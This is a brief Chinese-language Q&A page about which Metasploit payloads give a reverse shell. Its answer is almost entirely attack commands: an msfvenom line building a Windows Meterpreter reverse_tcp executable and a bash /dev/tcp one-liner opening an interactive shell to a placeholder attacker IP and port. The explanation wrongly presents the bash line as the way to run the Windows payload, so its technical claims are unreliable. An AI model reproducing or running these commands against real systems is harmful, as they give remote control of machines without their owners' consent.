bash 弹shell msf用什么payloads
时间: 2023-06-27 18:04:08 浏览: 235
可以使用Meterpreter反向TCP或HTTP(S) payload。例如,使用反向TCP payload:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > shell.exe
```
然后使用该payload在目标机器上执行:
```
bash -c "exec bash -i &>/dev/tcp/<attacker IP>/<attacker port> <&1"
```
这将在目标机器上打开一个反向TCP shell并连接到攻击者的机器。
阅读全文